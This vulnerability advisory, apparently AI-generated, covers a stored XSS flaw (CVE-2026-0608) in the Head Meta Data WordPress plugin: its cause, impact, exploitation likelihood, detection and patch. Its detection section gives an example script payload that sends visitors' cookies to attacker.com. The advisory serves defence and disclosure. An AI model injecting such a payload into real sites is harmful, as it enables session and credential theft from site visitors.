
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-0608 is a Stored Cross-Site Scripting (XSS) vulnerability in the Head Meta Data plugin for WordPress. It affects all plugin versions up to and including version 20251118, due to insufficient input sanitization and output escaping of the head-meta-data post meta field. The vulnerability was published on January 20, 2026, with the CVE record submitted by Wordfence. It carries a CVSS v3.1 base score of 6.4 (Medium), assigned by Wordfence (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). The plugin fails to properly sanitize user-supplied input stored in the head-meta-data post meta field and does not escape this data on output, allowing malicious scripts to be persisted and rendered in page context. Exploitation requires only contributor-level authentication (low privilege), operates over the network with low attack complexity, and does not require user interaction from the attacker — though victims must visit the injected page for the script to execute. The patched version (20260105) is available via the WordPress plugin repository, and the changeset diff is publicly accessible (WordPress Trac, Wordfence).
Successful exploitation allows an authenticated attacker with contributor-level access or higher to inject persistent malicious JavaScript into WordPress pages. When site visitors load an affected page, the injected script executes in their browser context, potentially enabling session cookie theft, credential harvesting, defacement, or redirection to malicious sites. The vulnerability has a changed scope (S:C), meaning the impact extends beyond the plugin itself to affect all users visiting injected pages, with low confidentiality and integrity impacts and no direct availability impact (Wordfence).
No evidence of active in-the-wild exploitation has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. Exploitation requires at minimum a contributor-level WordPress account, which limits the attack surface compared to unauthenticated vulnerabilities. No public proof-of-concept exploit code has been identified beyond the publicly available patch changeset (Feedly, Wordfence).
head-meta-data post meta field (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>).wp_postmeta table under the head-meta-data meta key for any post./wp-admin/post.php) from contributor-level accounts containing encoded script content in the head-meta-data parameter.<script> tags or obfuscated JavaScript within the <head> section of WordPress pages that are not part of the legitimate theme or plugin output.Site administrators should update the Head Meta Data plugin to version 20260105 or later, which includes the necessary input sanitization and output escaping fixes. The patch is available through the WordPress plugin repository. If immediate update is not possible, restricting contributor-level user registration or disabling the plugin temporarily are viable interim mitigations. Reviewing existing posts for unexpected content in the head-meta-data meta field is also recommended (WordPress Trac, Wordfence).
Wordfence disclosed the vulnerability and assigned the CVE as the coordinating CNA, publishing details in their weekly WordPress vulnerability report for January 19–25, 2026 (Wordfence Weekly Report). The vulnerability received limited broader community attention given its medium severity and authentication requirement, with coverage primarily limited to automated vulnerability tracking platforms such as VulDB, Vulners, and CVEFeed.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."